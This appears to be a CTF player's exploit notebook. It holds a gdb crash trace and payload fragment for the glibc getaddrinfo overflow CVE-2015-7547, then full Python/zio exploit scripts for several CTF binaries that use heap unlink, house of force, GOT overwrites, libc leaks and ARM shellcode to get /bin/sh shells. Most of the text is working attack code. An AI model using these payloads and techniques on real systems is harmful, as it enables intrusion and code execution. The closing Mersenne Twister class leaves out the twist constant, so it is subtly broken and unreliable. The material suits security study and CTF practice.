CVE-2015-7547

=> 0x8048573 <main+72>:	call   0x8048420 <getaddrinfo@plt>
=> 0xb7ed9c40 <__GI_getaddrinfo>: push ebp
Breakpoint 1, __GI_getaddrinfo (name=0x8048643 "bigtang.org",
service=0x8048640 "22", hints=0xbffff04c, pai=0xbffff044)
at ../sysdeps/posix/getaddrinfo.c:2323

=> 0xb7ed9d23 <__GI_getaddrinfo+227>: call 0xb7ed7470 <gaih_inet>
=> 0xb7ed7470 <gaih_inet>: push ebp
Breakpoint 2, gaih_inet (name=0x8048643 "bigtang.org", service=0xbfffef80,
req=0xbffff04c, pai=0xbfffef70, naddrs=0xbfffef7c)
at ../sysdeps/posix/getaddrinfo.c:275

=> 0xb7ed80c7 <gaih_inet+3159>: call edi
=> 0xb7def4d0 <_nss_dns_gethostbyname4_r>: push ebp
_nss_dns_gethostbyname4_r (name=0x8048643 "bigtang.org", pat=0xbfffeecc,
buffer=0xbfffe9e0 "\377\002", buflen=0x420, errnop=0xbfffeed0,
herrnop=0xbfffeedc, ttlp=0x0) at nss_dns/dns-host.c:284

=> 0xb7def58b <_nss_dns_gethostbyname4_r+187>: call 0xb7dedb70 <__libc_res_nsearch@plt>
=> 0xb7ddb240 <__GI___libc_res_nsearch>: push ebp
__GI___libc_res_nsearch (statp=0xb7fc1340 <_res>, name=0x8048643 "bigtang.org",
class=0x1, type=0xf371,
answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016", anslen=0x800,
answerp=0xbfffe97c, answerp2=0xbfffe980, nanswerp2=0xbfffe984,
resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c) at res_query.c:342

=> 0xb7ddb4c6 <__GI___libc_res_nsearch+646>:
call 0xb7ddaeb0 <__libc_res_nquerydomain>
=> 0xb7ddaeb0 <__libc_res_nquerydomain>: push ebp
__libc_res_nquerydomain (statp=statp@entry=0xb7fc1340 <_res>,
name=name@entry=0x8048643 "bigtang.org", domain=0x0, class=0x1,
type=0xf371, answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016",
anslen=0x800, answerp=0xbfffe97c, answerp2=0xbfffe980,
nanswerp2=0xbfffe984, resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c)
at res_query.c:563

=> 0xb7ddaf9c <__libc_res_nquerydomain+236>:
call 0xb7dda7f0 <__GI___libc_res_nquery>
=> 0xb7dda7f0 <__GI___libc_res_nquery>: push ebp
__GI___libc_res_nquery (statp=0xb7fc1340 <_res>, name=0x8048643 "bigtang.org",
class=0x1, type=0xf371,
answer=0xbfffe150 "\207C\371VcX\276\070\363\004\016", anslen=0x800,
answerp=0xbfffe97c, answerp2=0xbfffe980, nanswerp2=0xbfffe984,
resplen2=0xbfffe988, answerp2_malloced=0xbfffe98c) at res_query.c:124
124 in res_query.c

=> 0xb7dda969 <__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3]
EAX: 0xbfffe980 ('B' <repeats 200 times>...)
EBX: 0xb7dea000 --> 0x14ed4
ECX: 0xbfffe980 ('B' <repeats 200 times>...)
EDX: 0x42424242 ('BBBB')
ESI: 0xb7fc1340 --> 0x5
EDI: 0x42424242 ('BBBB')
EBP: 0xbfffd7f8 --> 0x0
ESP: 0xbfffd550 --> 0x16b04
EIP: 0xb7dda969 (<__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3])


EAX: 0xbfffe980 ("fA;5A;"...)

EBX: 0xb7dea000 --> 0x14ed4
ECX: 0xbfffe980 ("fA;5A;"...)
EDX: 0x353b4166 ('fA;5')
ESI: 0xb7fc1340 --> 0x5
EDI: 0x3b414a3b (';JA;')
EBP: 0xbfffd7f8 --> 0x0
ESP: 0xbfffd550 --> 0x11035
EIP: 0xb7dda969 (<__GI___libc_res_nquery+377>: movzx ecx,BYTE PTR [edi+0x3])

0x353b4166 2090 0x3b414a3b 2094

EAX: 0x0

EBX: 0x42424242 ('BBBB')
ECX: 0xb7fbe858 --> 0x804b000 --> 0x0
EDX: 0x0
ESI: 0x42424242 ('BBBB')
EDI: 0x42424242 ('BBBB')
EBP: 0x42424242 ('BBBB')
ESP: 0xbfffe9c0 --> 0x8044242
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbfffe9c0 --> 0x8044242
0004| 0xbfffe9c4 --> 0xbfffeecc --> 0xbfffee10 --> 0x0
0008| 0xbfffe9c8 --> 0xbfffe9e0 --> 0x2ff
0012| 0xbfffe9cc --> 0x420
0016| 0xbfffe9d0 --> 0xbfffeed0 --> 0xb ('\x0b')
0020| 0xbfffe9d4 --> 0xbfffeedc --> 0x2
0024| 0xbfffe9d8 --> 0x0
0028| 0xbfffe9dc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()


# Fragment of a larger script: dw()/dd(), id2 and data2 are defined outside
# this excerpt.  NOTE(review): the original indentation was lost in
# extraction; the lines below are assumed to form the body of the `if`.
if data2:
    data = ''
    data += dw(id2)
    #data += '\x00' * (2300)
    data += 'A'*38
    data += dd(0)+dd(0x31000000)
    data += 'A'*(2090-46)
    data += dd(0x08b00408)+dd(0x38b00408)
    data += 'B'*62
    # Length-prefixed reply built from the buffer above.
    data2_reply = dw(len(data)) + data

BCTF-2016-ruin

Download: ruin.7b694dc96bf316a40ff7163479850f78 ruin.idb

from zio import *

# Connection to the service under test; RAW print modes presumably echo the
# traffic on both directions.
io = zio(("127.0.0.1",2333),print_read=RAW,print_write=RAW)
#io = zio(("166.111.132.49",9999))

# Fixed addresses and offsets.  NOTE(review): nothing here is derived at
# runtime -- the values presumably belong to one specific build of the
# binary and its libc, so confirm them before reuse.
printf_plt = 0x8594
printf_got = 0x00010F58
printf_off = 0x385c0

atoi_got = 0x10f80
system_off = 0x2e7c8

def checkKey(key):
    """Wait for the 8-bit key prompt, then send *key* verbatim (no newline)."""
    prompt = "please input your 8-bit key:"
    io.read_until(prompt)
    io.write(key)

def updateKey(key):
    """Menu option 1: replace the stored key with *key* (sent without newline)."""
    menu_prompt = "Give me your choice(1-4):"
    key_prompt = "enter the new 16-bit key:"
    io.read_until(menu_prompt)
    io.writeline("1")
    io.read_until(key_prompt)
    io.write(key)

def editSecret(secret):
    """Menu option 2: send *secret* as the new secret (newline-terminated)."""
    exchange = (
        ("Give me your choice(1-4):", "2"),
        ("please input your secret:", secret),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def signName(name):
    """Menu option 3: answer the name-length prompt with *name* (as given)."""
    exchange = (
        ("Give me your choice(1-4):", "3"),
        ("please input your name length:", name),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def leakHeap():
    # Send a fixed key, then read what the service echoes after it: the bytes
    # between the echoed key and ' is' are taken as a 4-byte value.
    checkKey("bigtang!")
    io.read_until("bigtang!")
    addr = io.read_until(' is')[:-3]
    # Pad to 4 bytes in case fewer bytes came back; l32() presumably decodes
    # a little-endian 32-bit value (zio helper).
    addr = addr.ljust(4,'\x00')
    heap = l32(addr)-0x8
    # Note: when the computed value is 0 nothing is printed and the function
    # falls through, returning None.
    if heap:
        print "\n[+] Got Heap base: %x" % heap
        return heap

def leakLibc(heap):
    # Second key check; `heap` (from leakHeap()) only feeds the size passed
    # to signName() below.
    checkKey("security")

    # house of force
    editSecret(l32(0xffffffff).rjust(0x10,'\x00'))

    signName(str(0x10fa0-(heap+0x10)))
    updateKey((l32(atoi_got)+l32(0)+l32(atoi_got)).rjust(0x10,'\x00'))
    updateKey(l32(printf_plt).ljust(0x10,'\x00'))
    #raw_input()
    io.read_until("Give me your choice(1-4):")
    io.writeline("%6$s"+l32(printf_got))
    # Four raw bytes come back; the libc base is derived from them with the
    # fixed printf offset (the trailing -1 is not explained in the script).
    libc = l32(io.read(4)) - printf_off - 1
    print "\n[+] Got Libc base: %x" % libc
    return libc

# Run the two leaks in order, then the final interaction.
# NOTE(review): leakHeap() returns None when its computed value is 0; in
# that case leakLibc() would fail on `heap+0x10` rather than report it.
heap = leakHeap()
libc = leakLibc(heap)
system = libc + system_off
#editSecret(l32(libc+0x2e36c))
editSecret(l32(system))
#raw_input()
io.read_until("Give me your choice(1-4):")
io.writeline("/bin/sh\x00")
#raw_input("[*] Debug:")
io.interact()

Qiangwang-Cup-2015-imdb

Download: imdb.e31f5ffcdb6571a4e672382187bc6345
imdb.idb

from zio import *

# Target service; print_read/print_write are set to NONE (presumably no
# echo of the transcript).
host = "192.168.33.10"
port = 2333
io = zio((host,port),print_read=NONE,print_write=NONE)

# add a TV
def addTV(name,season,rating,introduction):
    """Menu option 1: create a TV entry from the four field values, one per line."""
    fields = [name, season, rating, introduction]
    io.read_until("Your choice? ")
    io.writelines(["1"] + fields)

# add a Movie
def addMovie(name,actors,rating,introduction):
    """Menu option 2: create a Movie entry from the four field values, one per line."""
    fields = [name, actors, rating, introduction]
    io.read_until("Your choice? ")
    io.writelines(["2"] + fields)

# remove an entry
def removeEntry(name):
    """Menu option 3: delete the entry called *name*."""
    choice = "3"
    io.read_until("Your choice? ")
    io.writelines([choice, name])

# show all TV/Movie
def showAll():
    """Menu option 4: ask the service to print every stored entry."""
    choice = "4"
    io.read_until("Your choice? ")
    io.writeline(choice)

# read any address
def readAddr(address):
    # Set-up allocations and removals performed before the fake record is
    # submitted (the exact layout they produce is not visible here).
    addTV("a"*0x10,"0","100","f"*0x7f)
    addTV("b"*0x10,"0","100","f"*0x7f)
    addTV("b"*0x10,"0","100","f"*0x7f)
    removeEntry("a"*0x10)
    removeEntry("b"*0x10)
    # Fake Movie record assembled field by field; the last word is the
    # address whose contents are presumably printed back by showAll().
    fakeMovie = ""
    fakeMovie += l64(0x4015b0)
    fakeMovie += ("b"*16).ljust(64,'\x00')
    fakeMovie += ("f"*0x80)
    fakeMovie += l64(0x42c80000)
    fakeMovie += l64(address)
    assert len(fakeMovie) == 0xd8  # 8 + 64 + 0x80 + 8 + 8 bytes
    addMovie("a"*0x10,fakeMovie,"100","f"*0x7f)
    showAll()
    # The value of interest follows the second "actors: " marker; it is
    # padded to 8 bytes before decoding.
    io.read_until("actors: ")
    io.read_until("actors: ")
    leak = l64(io.readline().strip().ljust(8,'\x00'))
    #print "[*] Got [0x%x] 0x%x " % (address,leak)
    # Remove both entries so the helper can be called again.
    removeEntry("a"*0x10)
    removeEntry("b"*0x10)
    return leak

# call any address
def callAddr(vtable,address):
    # Same set-up sequence as readAddr().
    addTV("a"*0x10,"0","100","f"*0x7f)
    addTV("b"*0x10,"0","100","f"*0x7f)
    addTV("b"*0x10,"0","100","f"*0x7f)
    removeEntry("a"*0x10)
    removeEntry("b"*0x10)
    # Fake Movie record; differs from readAddr() only in the first word
    # (`vtable` instead of the fixed 0x4015b0).
    fakeMovie = ""
    fakeMovie += l64(vtable)
    fakeMovie += ("b"*16).ljust(64,'\x00')
    fakeMovie += ("f"*0x80)
    fakeMovie += l64(0x42c80000)
    fakeMovie += l64(address)
    assert len(fakeMovie) == 0xd8  # 8 + 64 + 0x80 + 8 + 8 bytes
    addMovie("a"*0x10,fakeMovie,"100","f"*0x7f)
    # No cleanup afterwards: the entries stay in place.
    showAll()

# Two reads: one adjusted by a fixed offset to get a heap base, one used as
# the reference point for the libc base.
# NOTE(review): 0x601dc0, 0x601c40, 0x6fe30 and 0x46520 are fixed for one
# binary/libc build and are not discovered at runtime.
heap = readAddr(0x601dc0) - 0x10
vtable = heap + 0x1c0
print "[*] Got heap 0x%x" % heap

puts = readAddr(0x601c40)
libc = puts - 0x6fe30
print "[*] Got libc_base 0x%x " % (libc)
print "[*] Got spawn_Shell 0x%x" % (libc + 0x46520)


callAddr(vtable,libc + 0x46520)

io.interact()

RCTF-2015-Quals-pwn500

Download: g27_9f47c9e9d3e7605f3bbdd4f92e51250d
g27_9f47c9e9d3e7605f3bbdd4f92e51250d.idb

from zio import *

# create socket
# Scripted walk through the service's menus.  Every prompt string and every
# choice below is tied to the service's own menu text, and the order of the
# writes is the protocol -- reordering them desynchronises the session.
host = "127.0.0.1"
port = 2333
io = zio((host,port))

# check ID
check_id = '1' * 17 + '0'
io.read_until("Input your ID to check in:\n")
io.writeline(check_id)

# enable cantin
io.read_until("choose:\n")
io.writeline('1')
io.read_until("3.CanTin\n")
io.writeline('1')
io.read_until("Which carriage?\n")
io.writeline('5')

# read access code
io.read_until("choose:\n")
io.writeline('1')
io.writeline('1')
io.writeline('0')
io.writeline("Bigtang")

# leak access code
io.read_until("choose:\n")
io.writeline('1')
io.writeline('3')
io.read_until("want?\n")
# A negative quantity is sent at the "want?" prompt.
hungry = -235
io.writeline(str(hungry))
io.read_until("choose:\n")
io.writeline("4")

# open access code
io.read_until("choose:\n")
io.writeline('1')
io.read_until("3.CanTin\n")
io.writeline('1')
io.read_until("Which carriage?\n")
io.writeline('0')
io.read_until("Access code:")
io.writeline('\x58'*0x32)

# shellcode = ""
# shellcode += "\x01\x60\x8f\xe2" # add r6, pc, #1
# shellcode += "\x16\xff\x2f\xe1" # add bx r6
# shellcode += "\x40\x40" # eors r0, r0
# shellcode += "\x78\x44" # add r0, pc
# shellcode += "\x0c\x30" # adds r0, #12
# shellcode += "\x49\x40" # eors r1, r1
# shellcode += "\x52\x40" # eors r2, r2
# shellcode += "\x0b\x27" # movs r7, #11
# shellcode += "\x01\xdf" # svc 1
# shellcode += "\x01\x27" # movs r7, #1
# shellcode += "\x01\xdf" # svc 1
# shellcode += "\x2f\x2f" # .short 0x2f2f
# shellcode += "\x62\x69\x6e\x2f" # .word 0x2f6e6962
# shellcode += "\x2f\x73" # .short 0x732f
# shellcode += "\x68" # .byte 0x68

# Raw bytes actually sent; the commented-out block above lists the
# mnemonics of an earlier variant (presumably ARM, judging by them).
shellcode = ""
shellcode += "\x01\x30\x8f\xe2"
shellcode += "\x13\xff\x2f\xe1"
shellcode += "\x78\x46\x08\x30"
shellcode += "\x49\x1a\x92\x1a"
shellcode += "\x0b\x27\x01\xdf"
shellcode += "\x2f\x62\x69\x6e"
shellcode += "\x2f\x73\x68"

io.writeline('1')
io.writeline(shellcode)
#raw_input("Debug")
#io.writeline("whoami")
io.interact()

Practice-2016-heap-unlink

Download: heap

from zio import *

#io = zio('./heap')
# Remote target ('127.1' is shorthand for 127.0.0.1); the local-binary
# alternative above is commented out.
io = zio(('127.1',6666))

def Add_chunk(length):
    """Menu option 1: allocate a chunk of *length* bytes."""
    size = str(length)
    io.writeline('1')
    io.read_until('Input the size of chunk you want to add:')
    io.writeline(size)

def Set_chunk(index,data):
    """Menu option 2: write *data* into chunk *index* (data sent without newline)."""
    io.writeline('2')
    for prompt, reply in (('Set chunk index:', str(index)),):
        io.read_until(prompt)
        io.writeline(reply)
    io.read_until('Set chunk data:')
    io.write(data)

def Delete_chunk(index):
    """Menu option 3: free chunk *index*."""
    which = str(index)
    io.writeline('3')
    io.read_until('Delete chunk index:')
    io.writeline(which)

def Print_chunk(index):
    """Menu option 4: ask the service to print chunk *index*."""
    which = str(index)
    io.writeline('4')
    io.read_until('Print chunk index:')
    io.writeline(which)

# Three chunks of the same size.
Add_chunk(0x80)
Add_chunk(0x80)
Add_chunk(0x80)

# Payload written into chunk 0: a fake header with fd/bk computed relative
# to `ptr`, filler, then the header words of the following chunk.
# NOTE(review): `ptr` and `free_got` are fixed addresses for one build.
ptr = 0x8049d60
fd = ptr - 0xc
bk = ptr - 0x8
payload = ''
payload += l32(0) + l32(0x89) + l32(fd) + l32(bk) + 'A'*(0x80-4*4)
payload += l32(0x80) + l32(0x88)
Set_chunk(0, payload)
Set_chunk(2, '/bin/sh'.ljust(0x80,'\0'))
Delete_chunk(1)

free_got = 0x8049ce8
payload = l32(0)*3 + l32(free_got)
Set_chunk(0, payload)

# Print_chunk(0) yields 4 raw bytes; the two absolute constants are values
# observed in one debugging session of one libc build -- confirm before
# reuse, only their difference matters.
Print_chunk(0)
system = l32(io.read(4)) - 0xf75afc60 + 0xf7579190
Set_chunk(0, l32(system))

Delete_chunk(2)
io.interact()

0CTF-2015-Quals-freenote-x64

Download: freenote_x64

from zio import *

host = '127.0.0.1'
port = 10001
#target = (host,port)
# The local binary is the active target; the (host,port) tuple above is
# the commented-out remote alternative.
target = './freenote_x64'

# Very long timeout; coloured REPR print modes presumably echo the session.
io = zio(target,timeout=2333,print_read=COLORED(REPR,"yellow"),print_write=COLORED(REPR,"red"))

def List_Note():
    """Menu option 1: ask the service to list the notes."""
    choice = '1'
    io.read_until('Your choice: ')
    io.writeline(choice)

def New_Note(note):
    """Menu option 2: create a note; its length is sent first, the body last
    via write() (no trailing newline)."""
    exchange = (
        ('Your choice: ', '2'),
        ('Length of new note: ', str(len(note))),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)
    io.read_until('Enter your note: ')
    io.write(note)

def Edit_Note(num,note):
    """Menu option 3: overwrite note *num* with *note* (length sent first;
    unlike New_Note the body is newline-terminated)."""
    exchange = (
        ('Your choice: ', '3'),
        ('Note number: ', str(num)),
        ('Length of note: ', str(len(note))),
        ('Enter your note: ', note),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def Delete_Note(num):
    """Menu option 4: delete note *num*."""
    exchange = (
        ('Your choice: ', '4'),
        ('Note number: ', str(num)),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def Exit():
    """Menu option 5: leave the service's menu."""
    choice = '5'
    io.read_until('Your choice: ')
    io.writeline(choice)

# zio debugging aid; the address is presumably a breakpoint for an attached
# debugger and has no effect on the protocol itself.
io.gdb_hint([0x400b14])

# leak libc
# Four notes, two deletions, two re-allocations; the listing then carries
# two 8-byte values right after the 'e'*8 and 'f'*8 markers (padded to 8
# bytes before decoding).
New_Note('a'*0x10)
New_Note('b'*0x10)
New_Note('c'*0x10)
New_Note('d'*0x10)
Delete_Note(0)
Delete_Note(2)
New_Note('e'*0x8)
New_Note('f'*0x8)
List_Note()
io.read_until('e'*0x8)
heap_base = l64(io.read_until('\n').strip().ljust(8,'\x00'))
io.read_until('f'*0x8)
libc_base = l64(io.read_until('\n').strip().ljust(8,'\x00'))
Delete_Note(3)
Delete_Note(2)
Delete_Note(1)
Delete_Note(0)

# Absolute values recorded from one run of one libc build; only the
# differences matter.  NOTE(review): confirm them against the target libc.
system = libc_base + 0x7fde9b68f4f0 - 0x7fde9b9f1678
bin_sh = libc_base + 0x7fde9b7af160 - 0x7fde9b9f1678
heap = heap_base - 0x1940
print hex(system)
print hex(heap)


# Note body made of fake chunk headers with fd/bk computed from `heap`,
# padded so the total length is printed for verification.
fd = heap + 0x30 - 0x8*3
bk = heap + 0x30 - 0x8*2
payload = ''
payload += l64(0) + l64(0x81)
payload += l64(fd) + l64(bk)
payload += 'A'*(0x80-0x20)
payload += l64(0x80) + l64(0x90)
payload += 'B'*0x80
payload += l64(0) + l64(0x91)
#payload += 'C'*(0x20)
print len(payload)
New_Note(payload)
Delete_Note(1)

# Second body, padded with 'C' so its length equals the first one's.
# NOTE(review): free_got is a fixed address for one build of the binary.
free_got = 0x602018
payload2 = ''
payload2 += l64(3)
payload2 += l64(1) + l64(8) + l64(bin_sh)
payload2 += l64(1) + l64(8) + l64(free_got)
payload2 += 'C'*(len(payload)-len(payload2))
Edit_Note(0,payload2)
#List_Note()
Edit_Note(1,l64(system))
#List_Note()
Delete_Note(0)

io.interact()

0CTF-2015-Quals-freenote-x86

Download: freenote_x86

from zio import *

host = '127.0.0.1'
port = 10001
# Remote (host,port) is the active target here; the local binary is the
# commented-out alternative (the x64 script makes the opposite choice).
target = (host,port)
#target = './freenote_x86'

# Very long timeout; the quiet print modes are left commented out.
io = zio(target,timeout=2333)#,print_read=NONE,print_write=NONE)

def List_Note():
    """Menu option 1: ask the service to list the notes."""
    choice = '1'
    io.read_until('Your choice: ')
    io.writeline(choice)

def New_Note(note):
    """Menu option 2: create a note; its length is sent first, the body last
    via write() (no trailing newline)."""
    exchange = (
        ('Your choice: ', '2'),
        ('Length of new note: ', str(len(note))),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)
    io.read_until('Enter your note: ')
    io.write(note)

def Edit_Note(num,note):
    """Menu option 3: overwrite note *num* with *note* (length sent first;
    unlike New_Note the body is newline-terminated)."""
    exchange = (
        ('Your choice: ', '3'),
        ('Note number: ', str(num)),
        ('Length of note: ', str(len(note))),
        ('Enter your note: ', note),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def Delete_Note(num):
    """Menu option 4: delete note *num*."""
    exchange = (
        ('Your choice: ', '4'),
        ('Note number: ', str(num)),
    )
    for prompt, reply in exchange:
        io.read_until(prompt)
        io.writeline(reply)

def Exit():
    """Menu option 5: leave the service's menu."""
    choice = '5'
    io.read_until('Your choice: ')
    io.writeline(choice)

#io.gdb_hint([0x08048860])

# leak libc
# Same sequence as the x64 script, with 4-byte values: the listing carries
# them right after the 'eeee' and 'ffff' markers.
New_Note('a'*0x10)
New_Note('b'*0x10)
New_Note('c'*0x10)
New_Note('d'*0x10)
Delete_Note(0)
Delete_Note(2)
New_Note('e'*0x4)
New_Note('f'*0x4)
List_Note()
io.read_until('eeee')
heap_base = l32(io.read(4))
io.read_until('ffff')
libc_base = l32(io.read(4))
Delete_Note(3)
Delete_Note(2)
Delete_Note(1)
Delete_Note(0)

# Absolute values recorded from one run of one libc build; only the
# differences matter.  NOTE(review): confirm them against the target libc.
system = libc_base + 0xf759a360 - 0xf7702450
bin_sh = libc_base + 0xf76b91a9 - 0xf7702450
heap = heap_base - 0xd28
print hex(heap)
List_Note()

# Note body made of fake chunk headers with fd/bk computed from `heap`.
fd = heap + 0x18 - 0xc
bk = heap + 0x18 - 0x8
payload = ''
payload += l32(0) + l32(0x81)
payload += l32(fd) + l32(bk)
payload += 'A'*(0x80-0x10)
payload += l32(0x80) + l32(0x88)
payload += 'B'*0x80
payload += l32(0) + l32(0x89) #+ 'C'*0x60
#Exit()

New_Note(payload)
Delete_Note(1)

# Second body, padded with 'C' so its length equals the first one's.
# NOTE(review): free_got is a fixed address for one build of the binary.
free_got = 0x0804a29c
payload2 = ''
payload2 += l32(3)
payload2 += l32(1) + l32(4) + l32(bin_sh)
payload2 += l32(1) + l32(4) + l32(free_got)
payload2 += 'C'*(len(payload)-len(payload2))
Edit_Note(0,payload2)
#List_Note()
Edit_Note(1,l32(system))
#List_Note()
Delete_Note(0)

io.interact()
gdb-peda$ x/20wx 0x96cf000
0x96cf000: 0x00000000 0x00000c19 0x00000100 0x00000003
0x96cf010: 0x00000001 0x00000080 0x096cfc20 0x00000001
0x96cf020: 0x00000080 0x096cfca8 0x00000001 0x00000080
0x96cf030: 0x096cfd30 0x00000000 0x00000000 0x096cfdb8

gdb-peda$ x/110wx 0x96cfc18
0x96cfc18: 0x00000000 0x00000089 0x41414141 0x41414141
0x96cfc28: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc38: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc48: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc58: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc68: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc78: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc88: 0x41414141 0x41414141 0x41414141 0x41414141
0x96cfc98: 0x41414141 0x41414141 0x00000088 0x00000089
0x96cfca8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcb8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfce8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcf8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd08: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd18: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd28: 0x00000000 0x00000089 0x43434343 0x43434343
0x96cfd38: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd48: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd58: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd68: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd78: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd88: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfd98: 0x43434343 0x43434343 0x43434343 0x43434343
0x96cfda8: 0x43434343 0x43434343 0x00000198 0x00020251

gdb-peda$ x/20wx 0x96cf000
0x96cf000: 0x00000000 0x00000c19 0x00000100 0x00000001
0x96cf010: 0x00000001 0x00000180 0x096cfc20 0x00000000
0x96cf020: 0x00000000 0x096cfca8 0x00000000 0x00000000
0x96cf030: 0x096cfd30 0x00000000 0x00000000 0x096cfdb8

gdb-peda$ x/110wx 0x96cfc18
0x96cfc18: 0x00000000 0x00000189 0x00000000 0x00000081
0x96cfc28: 0x096cf00c 0x096cf010 0x42424242 0x42424242
0x96cfc38: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc48: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc58: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc68: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc78: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc88: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfc98: 0x42424242 0x42424242 0x00000080 0x00000088
0x96cfca8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcb8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfce8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfcf8: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd08: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd18: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd28: 0x00000000 0x00000089 0x42424242 0x42424242
0x96cfd38: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd48: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd58: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd68: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd78: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd88: 0x42424242 0x42424242 0x42424242 0x42424242
0x96cfd98: 0x42424242 0x42424242 0x43434343 0x00020261
0x96cfda8: 0x43434343 0x43434343 0x00000198 0x00020251

Pwnable.kr-brainfuck

Download: bf bf_libc.so

from zio import *

# libc offsets (presumably taken from the provided bf_libc.so) and one
# fixed address inside the binary.  NOTE(review): valid for that build only.
offset_gets = 0x66e50
offset_fgets = 0x65bc0
offset_system = 0x3f250
main = 0x08048671

# Remote target; a very long timeout and coloured REPR echo of the session.
target = ('pwnable.kr',9001)
io = zio(target,timeout=100000,print_read=COLORED(REPR,"yellow"),\
print_write=COLORED(REPR,"red"))
io.read_until('[ ]\n')

# Brainfuck program sent as one line: '<'/'>' move the cell pointer,
# '.' emits the current cell as a byte and ',' reads one byte into it.
payload = ''
payload += '<'*(0xa0-0x10)
payload += '.>.>.>.'
payload += '<<<'
payload += ',>,>,>,>'
payload += '>'*24
payload += ',>,>,>,>'
payload += ',>,>,>,>.'

#io.gdb_hint([0x8048655])

# The first four '.' produce 4 raw bytes, decoded as the fgets address;
# the other two addresses follow from the fixed offsets above.
io.writeline(payload)
fgets = l32(io.read(4))
#print hex(fgets)
system = fgets-offset_fgets+offset_system
gets = fgets-offset_fgets+offset_gets

# Each write() answers one group of four ',' in the program above.
io.write(l32(system))
io.write(l32(gets))
io.write(l32(main))
io.writeline('/bin/sh\x00')
io.interact()

Clone_an_MT19937_RNG_from_its_output

Problem: Clone_an_MT19937_RNG_from_its_output

#!/usr/bin/env python
# Written against python 3.3.1
# Matasano Problem 21,22
# Implement the MT19937 Mersenne Twister RNG
# generated from code on the wikipedia

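class MT19937:
    """MT19937 Mersenne Twister generator with 32-bit outputs.

    Keeps a 624-word state (``MT``) that is regenerated in full whenever
    ``index`` wraps back to 0, and tempers each state word on output.
    """

    def __init__(self, seed):
        """Create a generator whose state is expanded from *seed*.

        The seed is reduced to 32 bits so that ``MT[0]`` is a 32-bit word
        like every other state word; seeds equal modulo 2**32 therefore
        produce the same stream.
        """
        self.MT = [0] * 624
        self.index = 0
        # The original stored 0 here regardless of the argument.
        self.seed = seed & 0xffffffff
        self.initialize_generator(self.seed)

    def initialize_generator(self, seed):
        """Fill the 624-word state from *seed* with the seed-expansion recurrence."""
        self.MT[0] = seed & 0xffffffff
        for i in range(1, 624):
            prev = self.MT[i - 1]
            self.MT[i] = 0xffffffff & (0x6c078965 * (prev ^ (prev >> 30)) + i)

    def extract_number(self):
        """Return the next 32-bit output.

        A fresh state is generated when ``index`` is 0, i.e. before the very
        first output and again after every 624 outputs.
        """
        if self.index == 0:
            self.generate_numbers()

        y = self.MT[self.index]
        # Tempering: each step folds a shifted (and masked) copy of y into y.
        y ^= y >> 11
        y ^= (y << 7) & 0x9d2c5680
        y ^= (y << 15) & 0xefc60000
        y ^= y >> 18

        self.index = (self.index + 1) % 624
        return y

    def generate_numbers(self):
        """Advance the whole 624-word state by one twist, in place."""
        for i in range(624):
            # Top bit of MT[i] joined with the low 31 bits of its successor.
            y = (self.MT[i] & 0x80000000) + (self.MT[(i + 1) % 624] & 0x7fffffff)
            self.MT[i] = self.MT[(i + 397) % 624] ^ (y >> 1)
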